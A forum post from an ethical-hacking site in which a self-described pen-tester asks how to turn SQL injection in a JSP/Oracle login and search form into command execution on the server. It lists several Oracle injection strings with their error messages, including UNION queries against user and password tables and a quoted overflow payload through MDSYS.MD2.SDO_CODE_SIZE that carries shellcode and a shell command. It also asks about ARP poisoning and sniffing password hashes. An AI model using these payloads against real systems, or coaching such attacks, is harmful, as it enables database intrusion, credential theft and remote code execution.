The Ethical Hacker Network - Oracle SQL Injection help...

Latest Additions

Who's Online

Hello,

This is my first post at this community, wait I can help other too.

I'm pen-testing a host where have applications running
in JSP and Oracle as a back-end, I found 2 SQL Injections in this application, but I'm not been able to exploit it... if some Oracle SQL Injection master can help me Sad

The two scripts is like that:

One is a login form.

Two is a search form, where one of the options (the
city field) is vulnerable, so I belive it's a injection in a WHERE clause.

My objetive is use the Oracle database to execute commands in the Server (I don't care about data in the database).

If I try in the one (login form) the following strings
(Reference http://www.securityfocus.com/infocus/1644):

;select username from all_users where ''x''=''x'

or exists (select 1 from sys.dual) and ''x''=''x'

union select username from all_users where ''x''=''x'

or ''x''=''x'' --'

I get: ORA-01756: quoted string not properly terminated

If I try in the one (login form) the following strings (Reference
http://www.appsecinc.com/presentations/oracle_security.pdf):

UNION select password from DBA_USERS where 'q' = 'q'

I got: ORA-00907: missing right parenthesis

What already appear better, since know appear it have a "parenthesis" unterminated.

If I try in the one (login form) the following strings (Reference
http://seclists.org/lists/pen-test/2001/Dec/0036.html)

(SELECT username FROM all_users WHERE 1=1)

I got a html access denied message (like when i type a
wring user or pass), appear that subselects doesn't
work.

') UNION SELECT username FROM all_users WHERE (''='

I got: ORA-00904: invalid column name

However all_users is a valid table and username is a vaile colomn. Sad

1 - Why this happen? Someone know ? How can I fix it ?

I gained access to the host by other attack, and compromissed the database, and just for curious, I checked it, and it really exist:

USERNAME
SYS
SYSTEM
OUTLN
WMSYS
ORDSYS
ORDPLUGINS
MDSYS
CTXSYS
XDB
ANONYMOUS
WKSYS
WKPROXY
...
...

I also find a intersting reference (http://security-papers.globint.com.ar/oracle_security/AdvancedSQLInjectionInOracleDatabases.pdf)
where the guy show possibility of execute overflow via SQL Injections, with a string like that for example:

A'||TO_CHAR(MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR(227)||CHR(251)||CHR(90)||CHR(227)||CHR(120)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||chr(255)||chr(208)||'dir>c:\dir.txt'))--

2 - If I try it, I got a ORA-00907: missing right parenthesis, someone know how could I use it in my example ?

3 - Even if it worked, he redirect the output to c:\dir.txt, can't it be sent to stdout (web page return from query) ?

4 - Someone know a tool, that for example, I find a SQL Injection, and pass it to the tool, and it make several trys, to detect the right way to make the querys ?

ps: Out of topic, someone already had success (or know how to) compile programs that use raw sockets/libpcap/libnet with cygwin (Like compile
dsniff, ettercap,...) ?

ps2: Or do you know a good password in command line for windows (that can be totally installed via command line) and make arp poison and filter passwords hash like ntlm, oracle, sql server, etc?

Thank you a lot.

Cya